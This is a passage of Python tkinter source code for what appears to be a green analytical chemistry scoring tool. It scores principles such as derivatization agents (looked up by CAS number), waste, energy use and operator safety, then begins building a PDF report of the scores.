var_5a.set(1.0)
var_5b = DoubleVar(tab5)
var_5b.set(1.0)
def variableFive():
global var_5
a = var_5a.get()
b = var_5b.get()
if a == 1.0 and b == 1.0:
var_5 = 1.0
elif a == 0.5 and b == 1.0:
var_5 = 0.75
elif a == 0.0 and b == 1.0:
var_5 = 0.5
elif a == 1.0 and b == 0.0:
var_5 = 0.5
elif a == 0.5 and b == 0.0:
var_5 = 0.25
elif a == 0.0 and b == 0.0:
var_5 = 0.0
# on change dropdown value, get the dictionary value and modify the global variable
    def change_dropdown_5a(*args):
        """Trace callback for the automation dropdown: store the mapped sub-score in var_5a and recombine via variableFive()."""
        var_5a.set(var_5a_text_choices[var_5a_text.get()])
        print('var_5a:' + str(var_5a))
        variableFive()
        # global var_5
        # var_5 = var_5a.get() * var_5b.get()
        chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_5a_text.trace('w', change_dropdown_5a)
Label(tab5, text='Sample preparation:', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
var_5b_text = StringVar(tab5)
var_5b_text_choices = {'miniaturized': 1.0,
'not miniaturized': 0.0}
var_5b_text.set('select')
dropDown_5b = OptionMenu(tab5, var_5b_text, *var_5b_text_choices.keys())
dropDown_5b.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_5b.grid(sticky='w', row=4, column=0, padx=8, pady=8)
    def change_dropdown_5b(*args):
        """Trace callback for the miniaturization dropdown: store the mapped sub-score in var_5b and recombine via variableFive()."""
        var_5b.set(var_5b_text_choices[var_5b_text.get()])
        # print('var_5b:' + str(var_5b))
        # global var_5
        # var_5 = var_5a.get() * var_5b.get()
        variableFive()
        print('var_5:' + str(var_5))
        chartPlotter()
var_5b_text.trace('w', change_dropdown_5b)
W_5 = weightChoice(10, 0, tab5, weight_5)
# *****************************************************************************************************************
# TAB 6
# *****************************************************************************************************************
content_6 = tab(tab6, text1='Derivatization should be avoided.', text2='Select derivatization agents (if used):')
# combine the selected options into a single string to produce a label caption
def concatenate_text(list_):
caption = ''
for i in list_:
caption = caption + i + '; '
return caption
    def Select():
        """Append the current Listbox selection to the global CAS list, refresh the
        caption label, and recompute the Principle 6 score *var_6* as the product
        of the selected agents' individual scores minus a flat 0.2 penalty
        (floored at 0.0) for using derivatization agents at all.

        NOTE(review): if invoked with an empty selection and an empty global list
        the 0.2 penalty still applies (var_6 becomes 0.8) — confirm intended.
        """
        reslist = list()
        selecion = lbox.curselection()
        for i in selecion:
            entered = lbox.get(i)
            reslist.append(entered)
            global_list.append(entered)
        # update the label box with selected deriv. agents:
        print(reslist)
        print(global_list)
        v.set(concatenate_text(global_list))
        global var_6
        var_6 = 1.0
        # add a -0.2 penalty for using derivatization agents:
        for CAS in global_list:
            var_6 = var_6 * lbox_list[CAS]
        if var_6 > 0.2:
            var_6 = var_6 - 0.2
        else:
            var_6 = 0.0
        print(var_6)
        chartPlotter()
# update the list box
    def update_list(*args):
        """Filter the CAS Listbox to entries containing the (case-insensitive) search term; empty term shows all."""
        search_term = search_var.get()
        lbox.delete(0, END)
        for item in lbox_list.keys():
            if search_term.lower() in item.lower():
                lbox.insert(END, item)
# clear the selection and the displayed label caption
    def clear_list():
        """Reset the Principle 6 state: clear the caption label, empty the global CAS list, restore var_6 to 1.0."""
        global v, global_list
        v.set('')
        global var_6
        var_6 = 1.0
        global_list = []
        chartPlotter()
# create global variables
global_list = []
# if derivatization should be avoided, then shouldn't the highest value in the case in which derivatization agents are used be lower than 1.0?
lbox_list = {
# "None": 1.1,
"5950-69-6": 1,
"30084-90-3": 1,
"12093-10-6": 1,
"6283-74-5": 1,
"119-53-9": 1,
"126-81-8": 1,
"24257-93-0": 1,
"58068-85-2": 0.949158975023003,
"1273-85-4": 0.949158975023003,
"4233-33-4": 0.949158975023003,
"100-10-7": 0.949158975023003,
"38183-12-9": 0.945068038553621,
"41468-25-1": 0.937140592655187,
"1395920-13-4": 0.937140592655187,
"521-24-4": 0.937140592655187,
"56606-21-4": 0.935584744799731,
"65-22-5": 0.925393321432741,
"68123-33-1": 0.925393321432741,
"913253-56-2": 0.913914155272091,
"124522-09-4": 0.913914155272091,
"223463-14-7": 0.902699986612441,
"1118-68-9": 0.901394170230429,
"952102-12-4": 0.901394170230429,
"536-69-6": 0.901394170230429,
"203256-20-6": 0.901394170230429,
"86516-36-1": 0.899210326049394,
"861881-76-7": 0.886368566581839,
"56139-74-3": 0.869932201280637,
"84806-27-9": 0.865490140567591,
"91366-65-3": 0.865490140567591,
"67229-93-0": 0.855427480281241,
"1273-82-1": 0.855042238169516,
"50632-57-0": 0.846792397075292,
"10199-89-0": 0.839008465483774,
"152111-91-6": 0.836037308222637,
"7149-49-7": 0.830362674910287,
"3029-19-4": 0.830362674910287,
"68572-87-2": 0.829473879117877,
"12152-94-2": 0.829473879117877,
"29270-56-2": 0.829154698457689,
"24463-19-2": 0.827803622060042,
"100-39-0": 0.825375773537705,
"550-44-7": 0.822230968349539,
" 49759-20-8": 0.822230968349539,
"38609-97-1": 0.822230968349539,
"35661-51-9": 0.822230968349539,
"10401-59-9": 0.822230968349539,
"70402-14-1": 0.822230968349539,
"131076-14-7": 0.822230968349539,
"214147-22-5": 0.822230968349539,
"4930-98-7": 0.822230968349539,
"569355-30-2": 0.822230968349539,
"53348-04-2": 0.820406195102248,
"67580-39-6": 0.818423316626862,
"68133-98-2": 0.814016502590708,
"81864-15-5": 0.814016502590708,
"113722-81-9": 0.814016502590708,
"15537-71-0": 0.809079828950995,
"33008-06-9": 0.809079828950995,
"139332-64-2": 0.809079828950995,
"62642-61-9": 0.806764775754175,
"100139-54-6": 0.806764775754175,
"62796-29-6": 0.797901423240715,
"87-13-8": 0.783298381421747,
"35231-44-8": 0.778837259389339,
"88404-25-5": 0.778837259389339,
"485-47-2": 0.77674392680131,
"58520-45-9": 0.776282830117383,
"107-91-5": 0.776282830117383,
"139332-66-4": 0.776282830117383,
"89-25-8": 0.776282830117383,
"18428-76-7": 0.776282830117383,
"20624-25-3": 0.763216179776723,
"27072-45-3": 0.762516465156704,
"1459205-36-7": 0.755628677634781,
"96483-68-0": 0.747181595887401,
"132098-76-1": 0.747181595887401,
"98-59-9": 0.746227267824334,
"7612-98-8": 0.744246233476037,
"5415-58-7": 0.742560985030801,
"76-83-5": 0.740506239181083,
"1293-79-4": 0.740506239181083,
"28920-43-6": 0.740506239181083,
"100-07-2": 0.740506239181083,
"99-73-0": 0.738962425018157,
"22265-37-8": 0.737084384687495,
"3731-51-9": 0.737084384687495,
"141903-34-6": 0.737084384687495,
"122-04-3": 0.732376041854033,
"4755-50-4": 0.732376041854033,
"99-33-2": 0.732376041854033,
"605-65-2": 0.723192330411814,
"56512-49-3": 0.723192330411814,
"126565-42-2": 0.723192330411814,
"7693-46-1": 0.721322673837572,
"1711-06-4": 0.717883414280986,
"93128-04-2": 0.717798274857161,
"613-54-7": 0.716357636495872,
"74367-78-5": 0.710065827927279,
"119-26-6": 0.692633685424727,
"2508-19-2": 0.692425832968952,
"21614-17-5": 0.682522312223409,
"80-11-5": 0.681782236352849,
"100-46-9": 0.679263084173718,
"55486-13-0": 0.666338980106273,
"16315-59-6": 0.665281844920184,
"5102-79-4": 0.664748970983542,
"70-34-8": 0.664086673111964,
"132-32-1": 0.659883743356088,
"36410-81-8": 0.659179085176979,
"100-16-3": 0.659159320154698,
"104077-15-8": 0.659091847163412,
"4083-64-1": 0.649947842697737,
"21324-39-0": 0.634865149902982,
"2978-11-2_": 0.629540812510628,
"456-27-9": 0.628988106517093,
"98-09-9": 0.628032387327697,
"103-72-0": 0.606674230911606,
"504-29-0": 0.587444277328904,
"86-84-0": 0.566544585073271,
"36877-69-7": 0.556132009449506,
"103-71-9": 0.525453097624119,
"551-06-4": 0.510591749035237,
"643-79-8": 0.486298449205041,
"98-88-4": 0.475562851988167,
"5470-11-1": 0.466906948575218,
"99-65-0": 0.414382740812551,
"95-54-5": 0.409876625997181,
"60-24-2": 0.380580959884422,
"1118-71-4": 1,
"4426-47-5": 0.98287765750619,
"35342-88-2": 0.934408589712128,
"13435-12-6": 0.934408589712128,
"122-51-0": 0.90808769546171,
"17455-13-9": 0.898290310316299,
"7449-74-3": 0.896162794934563,
"1188-33-6": 0.873968193624155,
"1133-63-7": 0.845047181007906,
"57981-02-9": 0.843544327015115,
"3449-26-1": 0.831289869514086,
"54925-64-3": 0.831289869514086,
"7453-26-1": 0.831289869514086,
"23231-91-6": 0.82477424558194,
"423-39-2": 0.821174784952006,
"3332-29-4": 0.817379220173597,
"18297-63-7": 0.804205531712304,
"13257-81-3": 0.796997494513717,
"73980-71-9": 0.796226219175859,
"828-73-9": 0.796226219175859,
"36805-97-7": 0.785921382127458,
"6006-65-1": 0.785921382127458,
"4909-78-8": 0.785921382127458,
"920-68-3": 0.785921382127458,
"653-37-2": 0.78349900067157,
"422-05-9": 0.78349900067157,
"2182-66-3": 0.766534069464941,
"354-64-3": 0.763789874990475,
"58479-61-1": 0.763598909336104,
"13154-24-0": 0.763598909336104,
"70-11-1": 0.761090045768687,
"723336-86-5": 0.761090045768687,
"850418-19-8": 0.761090045768687,
"850418-20-1": 0.761090045768687,
"1546-79-8": 0.758242430472499,
"24589-78-4": 0.758242430472499,
"53296-64-3": 0.758242430472499,
"77377-52-7": 0.758242430472499,
"82112-21-8": 0.757927402509425,
"375-22-4": 0.756114760094685,
"336-59-4": 0.756114760094685,
"356-42-3": 0.756114760094685,
"420-37-1": 0.75205982910284,
"77-76-9": 0.750711985826051,
"20082-71-7": 0.749832128609721,
"2251-50-5": 0.747481224283863,
"100-11-8": 0.745015119615777,
"18162-48-6": 0.743146183479067,
"425-75-2": 0.742441949845756,
"1765-40-8": 0.742441949845756,
"76437-40-6": 0.742441949845756,
"80522-42-5": 0.742441949845756,
"1538-75-6": 0.74152936540163,
"98-03-3": 0.739537905180287,
"87020-42-6": 0.737007165264001,
"589-15-1": 0.736264650708209,
"2857-97-8": 0.736016815715654,
"17950-40-2": 0.732111366794642,
"407-25-0": 0.731258587142799,
"115-20-8": 0.730613289210088,
"823-96-1": 0.721670319376414,
"71735-32-5": 0.7183910746808,
"333-27-7": 0.7183910746808,
"996-50-9": 0.714539433160182,
"3768-58-9": 0.714539433160182,
"685-27-8": 0.713300737795531,
"25561-30-2": 0.713300737795531,
"124-41-4": 0.70689269806413,
"15933-59-2": 0.705803556150421,
"18156-74-6": 0.705803556150421,
"123-62-6": 0.703483768736821,
"2083-91-2": 0.703043095426246,
"10416-59-8": 0.700353286433786,
"69739-34-0": 0.696757084764058,
"107-46-0": 0.696026303459663,
"541-88-8": 0.680085578563036,
"994-30-9": 0.659639561940176,
"75-26-3": 0.65077439166517,
"543-27-1": 0.643008761928377,
"6092-54-2": 0.619827404668639,
"76-02-8": 0.618803077595292,
"75-77-4": 0.606190113014358,
"7719-09-7": 0.598432942089881,
"1066-35-9": 0.590259358282054,
"4637-24-5": 0.587695662266982,
"920-66-1": 0.5835440122017,
"8077-35-8": 0.580905093441462,
"108-24-7": 0.56539851162607,
"10294-34-5": 0.546920496297807,
"999-97-3": 0.539120875551113,
"7637-07-2": 0.536295783559384,
"75-89-8": 0.517064147633066,
"1899-02-1": 0.453968334570473,
"17287-03-5": 0.450591161239778,
"7664-93-9": 0.430740368201206,
"132228-87-6": 0.389860157052623,
"75-59-2": 0.35207841911058,
"77-78-1": 0.185707987424391,
"19132-06-0": 1,
"1052236-86-8": 1,
"135806-59-6": 1,
"139658-04-1": 1,
"108031-79-4": 1,
"124529-02-8": 0.789788397239459,
"124529-07-3": 0.789788397239459,
"24277-43-8": 0.789788397239459,
"958300-06-6": 0.789788397239459,
"5978-70-1": 0.661143997568766,
"3886-70-2": 0.62276366189702,
"20445-31-2": 0.616318224518582,
"17257-71-5": 0.616318224518582,
"81655-41-6": 0.616318224518582,
"21451-74-1": 0.616318224518582,
"14645-24-0": 0.616318224518582,
"147948-52-5": 0.581990910059596,
"104371-20-2": 0.581990910059596,
"132679-61-9": 0.56145194750795,
"210529-62-7": 0.56145194750795,
"3347-90-8": 0.550846501071722,
"104530-16-7": 0.547959104197752,
"39637-74-6": 0.547959104197752,
"39262-22-1": 0.52022184149657,
"1517-69-7": 0.474716248097616,
"1445-91-6": 0.474716248097616,
"107474-79-3": 0.437963083473382,
"14602-86-9": 0.412055011328408,
"3886-69-9": 0.358144912356212,
"2627-86-3": 0.326740839342668,
"24277-44-9": 0.288185973785988,
"62414-75-9": 0.288185973785988,
"14152-97-7": 0.288185973785988,
"42340-98-7": 0.176714727821325,
"14649-03-7": 0.132441393121765,
"33375-06-3": 0.116078677380125,
}
v = StringVar()
chckbxVar_tab6 = StringVar()
chckbxVar_tab6.set('disabled')
# set initial blank value of the StringVar
v.set('')
search_var = StringVar()
search_var.trace("w", update_list)
entry = ttk.Entry(tab6, textvariable=search_var, width=13)
# disable the lookup box initially:
# entry.config(state=DISABLED)
scrollbar = ttk.Scrollbar(tab6, orient='vertical')
scrollbar.grid(row=3, column=0, sticky='w', ipady=30, padx=(220, 0))
lbox = Listbox(tab6, width=34, height=6, yscrollcommand=scrollbar.set) # selectmode=MULTIPLE
# disable the lbox initially:
# lbox.config(state=DISABLED)
# def lboxActivator():
#
# # chckbxVar_tab6.set('disabled')
# if chckbxVar_tab6.get() == 'enabled':
# entry.config(state=ACTIVE)
# lbox.config(state=NORMAL)
# elif chckbxVar_tab6.get() == 'disabled':
# entry.config(state=DISABLED)
# lbox.config(state=DISABLED)
#
# ttk.Checkbutton(tab6, text='Derivatisation agent is used', command=lboxActivator, variable=chckbxVar_tab6, onvalue='enabled', offvalue='disabled').grid(row=30, column=0)
# lboxActivator()
Label(tab6, text='CAS lookup: ').grid(row=2, column=0, padx=8, pady=3, sticky='w')
entry.grid(row=2, column=0, padx=(100, 0), pady=3, sticky='w')
lbox.grid(row=3, column=0, padx=8, pady=3, sticky='w')
# link the scrollbar to the list box
scrollbar.config(command=lbox.yview)
ttk.Button(tab6, text="Select", command=Select, width=8).grid(column=1, row=3, padx=4)
# clear the selection and the caption
ttk.Button(tab6, text='Clear', command=lambda:[clear_list(), update_list()], width=8).grid(column=1, row=4, padx=4)
Label(tab6, text='Selected CAS: ').grid(column=0, row=4, sticky='w', padx=8, pady=0)
ttk.Label(tab6, textvariable=v, wraplength=180, width=34, relief='groove').grid(column=0, row=5, sticky='w', padx=8, pady=4)
# call the function to populate the list at the beginning
update_list()
W_6 = weightChoice(10, 0, tab6, weight_6)
# *****************************************************************************************************************
# TAB 7
# *****************************************************************************************************************
content_7 = tab(tab7, text1='Generation of a large volume of analytical waste should be avoided, and proper management'
'of analytical waste should be provided.', text2='Enter the amount of waste in g or mL:')
amount_var7 = StringVar()
amount_var7.set('input')
# the event=None is passed so that the entry.bind does not return a positional argument
def change_entry_7(event=None):
global var_7
var_7 = None
try:
if float(amount_var7.get()) > 150:
var_7 = 0
elif float(amount_var7.get()) < 0.1:
var_7 = 1.0
else:
var_7 = abs(-0.134 * log(float(amount_var7.get())) + 0.6946) # absolute value to avoid negative values
print('var_7:' + str(var_7))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
sample_amount_entry7 = ttk.Entry(tab7, textvariable=amount_var7, width=15)
sample_amount_entry7.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# bind the <Return> key to the entry window, so that the function gets called as an alternative to the 'set' button:
sample_amount_entry7.bind('<Return>', change_entry_7)
# insert a button that does the same:
ttk.Button(tab7, text='Set', command=change_entry_7).grid(row=2, column=0, padx=8, pady=8)
W_7 = weightChoice(10, 0, tab7, weight_7)
# *****************************************************************************************************************
# TAB 8
# *****************************************************************************************************************
content_8 = tab(tab8, text1='Multi-analyte or multi-parameter methods are preferred '
'versus methods using one analyte at a time.',
text2='Number of analytes determined in a single run:')
amount_var8a = StringVar()
amount_var8a.set('input')
sample_amount_entry8a = ttk.Entry(tab8, textvariable=amount_var8a, width=15)
sample_amount_entry8a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
Label(tab8, text='Sample throughput (samples analysed per hour):', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
amount_var8b = StringVar()
amount_var8b.set('input')
sample_amount_entry8b = ttk.Entry(tab8, textvariable=amount_var8b, width=15)
sample_amount_entry8b.grid(sticky='w', row=4, column=0, padx=8, pady=8)
def change_entry_8(event=None):
global var_8
var_8 = None
try:
if (float(amount_var8a.get()) * float(amount_var8b.get())) < 1.0:
var_8 = 0.0
elif (float(amount_var8a.get()) * float(amount_var8b.get())) > 70.0:
var_8 = 1.0
else:
var_8 = abs(0.2429 * log(float(amount_var8a.get()) * float(amount_var8b.get())) - 0.0517) # absolute value to avoid negative values
print('var_8:' + str(var_8))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
# refresh the plot:
chartPlotter()
sample_amount_entry8b.bind('<Return>', change_entry_8)
ttk.Button(tab8, text='Set', command=change_entry_8).grid(row=5, column=0, padx=8, pady=8)
W_8 = weightChoice(10, 0, tab8, weight_8)
# *****************************************************************************************************************
# TAB 9
# *****************************************************************************************************************
content_9 = tab(tab9, text1='The use of energy should be minimized.',
text2='Select the most energy-intensive technique used in the method:')
var_9_text = StringVar(tab9)
amount_var9 = StringVar(tab9)
amount_var9.set('input')
# Dictionary with options
var_9_text_choices = { 'None': 1.0,
'FTIR': 1.0, # what about vortexing, incubation, etc.? Mineralization?
'Immunoassay': 1.0,
'Spectrofluorometry': 1.0,
'Titration': 1.0,
'UPLC': 1.0,
'UV-Vis Spectrometry': 1.0,
'AAS': 0.5,
'GC': 0.5,
'ICP-MS': 0.5,
'LC': 0.5,
'NMR': 0.0,
'GC-MS': 0.0,
'LC-MS': 0.0,
'X-ray diffractometry': 0.0}
var_9_text.set('select')
dropDown_9 = OptionMenu(tab9, var_9_text, *var_9_text_choices.keys())
dropDown_9.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_9.grid(sticky='w', row=2, column=0, padx=8, pady=8)
    def change_dropdown_9(*args):
        """Trace callback for the Principle 9 dropdown: map the selected technique to its energy score."""
        global var_9
        var_9 = 1.0
        var_9 = var_9_text_choices[var_9_text.get()]
        print('var_9:' + str(var_9))
        chartPlotter()
var_9_text.trace('w', change_dropdown_9)
ttk.Label(tab9, text='Alternatively, estimate the total power consumption of a single analysis in kWh:', wraplength=250, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
sample_amount_entry9 = ttk.Entry(tab9, textvariable=amount_var9, width=15)
sample_amount_entry9.grid(sticky='w', row=4, column=0, padx=8, pady=8)
def change_entry_9(event=None):
global var_9
var_9 = 1.0
try:
if float(amount_var9.get()) > 1.5:
var_9 = 0.0
elif float(amount_var9.get()) < 0.1:
var_9 = 1.0
else:
var_9 = abs(-0.7143 * (float(amount_var9.get())) + 1.0714) # absolute value to avoid negative values
print('var_9:' + str(var_9))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
sample_amount_entry9.bind('<Return>', change_entry_9)
ttk.Button(tab9, text='Set', command=change_entry_9).grid(row=4, column=0, padx=8, pady=8)
W_9 = weightChoice(10, 0, tab9, weight_9)
# *****************************************************************************************************************
# TAB 10
# *****************************************************************************************************************
content_10 = tab(tab10, text1='Reagents obtained from renewable sources should be preferred.',
text2='Select the type of reagents:')
var_10_text = StringVar(tab10)
# Dictionary with options
var_10_text_choices = {'No reagents': 1.0,
'All reagents are bio-based': 1.0,
'Some reagents are bio-based': 0.5,
'None of the reagents are from bio-based sources': 0.0
}
var_10_text.set('select')
dropDown_10 = OptionMenu(tab10, var_10_text, *var_10_text_choices.keys())
dropDown_10.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_10.grid(sticky='w', row=2, column=0, padx=8, pady=8)
def change_dropdown_10(*args):
global var_10
var_10 = None
var_10 = var_10_text_choices[var_10_text.get()]
print('var_10:' + str(var_10))
chartPlotter()
var_10_text.trace('w', change_dropdown_10)
W_10 = weightChoice(10, 0, tab10, weight_10)
# *****************************************************************************************************************
# TAB 11
# *****************************************************************************************************************
content_11 = tab(tab11, text1='Toxic reagents should be eliminated or replaced.',
text2='Does the method involve the use of toxic reagents?')
var_11a_text = StringVar(tab11)
# Dictionary with options
var_11a_text_choices = {'No': 1.0,
'Yes': 0.0}
var_11a_text.set('Select')
dropDown_11a = OptionMenu(tab11, var_11a_text, *var_11a_text_choices.keys())
dropDown_11a.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_11a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
def enabler_11b():
if float(var_11a_text_choices[var_11a_text.get()]) == 0.0:
return 'enabled'
else:
return 'disabled'
amount_var11b = StringVar(tab11)
amount_var11b.set(0.0)
def change_dropdown_11a(*args):
global var_11
var_11 = 1.0
var_11 = var_11a_text_choices[var_11a_text.get()]
Label(tab11, text='Amount of toxic reagents in g or mL:', wraplength=300, justify=LEFT).grid(sticky='w', row=3, column=0, padx=8, pady=8)
reagent_entry_11 = ttk.Entry(tab11, textvariable=amount_var11b, width=15, state=enabler_11b())
reagent_entry_11.grid(sticky='w', row=4, column=0, padx=8, pady=8)
reagent_entry_11.bind('<Return>', change_dropdown_11a)
ttk.Button(tab11, text='Set', command=change_dropdown_11a).grid(row=5, column=0, padx=8, pady=8)
if float(var_11a_text_choices[var_11a_text.get()]) != 1.0:
try:
if float(amount_var11b.get()) < 0.1:
var_11 = 0.8
elif float(amount_var11b.get()) > 50.0:
var_11 = 0.0
else:
var_11 = abs(-0.129 * log(float(amount_var11b.get())) + 0.5012) # absolute value to avoid negative
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
else:
pass
chartPlotter()
print(var_11)
var_11a_text.trace('w', change_dropdown_11a)
W_11 = weightChoice(10, 0, tab11, weight_11)
# *****************************************************************************************************************
# TAB 12
# *****************************************************************************************************************
content_12 = tab(tab12, text1='Operator\'s safety should be increased.',
text2='Select the threats which are not avoided:')
varA = IntVar()
varB = IntVar()
varC = IntVar()
varD = IntVar()
varE = IntVar()
varF = IntVar()
varG = IntVar()
ttk.Checkbutton(tab12, text='toxic to aquatic life', variable=varA).grid(row=2, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='bioacumulative', variable=varB).grid(row=3, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='persistent', variable=varC).grid(row=4, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='highly flammable', variable=varD).grid(row=5, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='highly oxidizable', variable=varE).grid(row=6, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='exposive', variable=varF).grid(row=7, sticky='w', padx=8)
ttk.Checkbutton(tab12, text='corrosive', variable=varG).grid(row=8, sticky='w', padx=8)
def testPrint():
# print(varA.get(), varB.get(), varC.get(), varD.get(), varE.get(), varF.get(), varG.get())
global var_12a
var_12a = (varA.get() + varB.get() + varC.get() + varD.get() + varE.get() + varF.get() + varG.get())
# print(var_12a)
global var_12
if var_12a == 0:
var_12 = 1.0
elif var_12a == 1:
var_12 = 0.8
elif var_12a == 2:
var_12 = 0.6
elif var_12a == 3:
var_12 = 0.4
elif var_12a == 4:
var_12 = 0.2
else:
var_12 = 0.0
print ('var_12: %f' % var_12)
chartPlotter()
ttk.Button(tab12, text='Set', command=testPrint).grid(row=9, column=0, padx=8, pady=8)
W_12 = weightChoice(10, 0, tab12, weight_12)
##################################################################################################
# pack the tab parent and its tabs:
tab_parent.pack(expand=1, fill='both')
# ttk.Button(leftFrame, text='Print score', command=printScore).pack(side=BOTTOM)
# generate the default chart at the beginning:
chartPlotter()
############################################################################################################
# generate the report in .pdf:
def generateReport():
# connect a float in range 0.0 : 1.0 to a colour in a spectrum from red to yellow to green (256 discrete colour values):
def colorMapper(value):
cmap = LinearSegmentedColormap.from_list('rg', ["red", "yellow", "green"], N=256)
mapped_color = int(value * 255)
color = cmap(mapped_color)
color_255 = []
for band in color:
color_255.append(int(band * 255))
return tuple(color_255)
pdf = FPDF('P', 'mm', 'A4')
pdf.set_font('Arial', '', 10)
pdf.add_page()
pdf.set_margins(left=30, top=30)
# save a temp image to the program's location:
plt.savefig('temp_figure.png', bbox_inches='tight')
# insert image (image, x, y, width):
pdf.image('temp_figure.png', 107, 10, 80)
# delete the temp file from drive:
os.remove('temp_figure.png')
# insert title (Arial, 'B'old, 14 pt):
pdf.set_font('Arial', 'B', 14.0)
pdf.ln(10)
pdf.cell(100, 12, 'Green index report sheet')
pdf.set_font('Arial', '', 12)
pdf.ln(15)
now = datetime.now()
pdf.cell(100, 12, now.strftime("%d/%m/%Y %H:%M:%S"))
# Text height is the same as current font size
th = pdf.font_size + 2
# a function to change the colour of a field based on the value:
def fieldColor(score):
x = colorMapper(score)[0]
y = colorMapper(score)[1]
z = colorMapper(score)[2]
pdf.set_fill_color(x, y, z)
pdf.ln(70)
# populate the table
# Table head:
pdf.set_font('Arial', 'B', 10)
pdf.cell(120, th, 'Criteria', border=0)
pdf.cell(15, th, 'Score', border=0)
pdf.cell(15, th, 'Weight', border=0)
pdf.set_font('Arial', '', 10)
pdf.ln(th)
pdf.set_fill_color(240, 240, 240)
# Rule 1
# Save top coordinate
top = pdf.y
# Calculate x position of next cell
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '1. Direct analytical techniques should be applied to avoid sample treatment.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_1)
pdf.cell(15, th * 1.6, str(round(var_1, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_1.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 2
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '2. Minimal sample size and minimal number of samples are goals.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_2)
pdf.cell(15, th * 1.6, str(round(var_2, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_2.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 3
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '3. If possible, measurements should be performed in situ.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_3)
pdf.cell(15, th * 1.6, str(round(var_3, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_3.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 4
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '4. Integration of analytical processes and operations saves energy and reduces the use of reagents.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_4)
pdf.cell(15, th * 1.6, str(round(var_4, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_4.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 5
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '5. Automated and miniaturized methods should be selected.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_5)
pdf.cell(15, th * 1.6, str(round(var_5, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_5.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 6
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '6. Derivatization should be avoided.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_6)
pdf.cell(15, th * 1.6, str(round(var_6, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_6.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 7
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '7. Generation of a large volume of analytical waste should be avoided, and proper management of analytical waste should be provided.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_7)
pdf.cell(15, th * 1.6, str(round(var_7, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_7.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 8
top = pdf.y
offset = pdf.x + 120
pdf.multi_cell(120, th * 0.8, '8. Multi-analyte or multi-parameter methods are preferred versus methods using one analyte at a time.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_8)
pdf.cell(15, th * 1.6, str(round(var_8, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_8.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 9
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '9. The use of energy should be minimized.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_9)
pdf.cell(15, th * 1.6, str(round(var_9, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
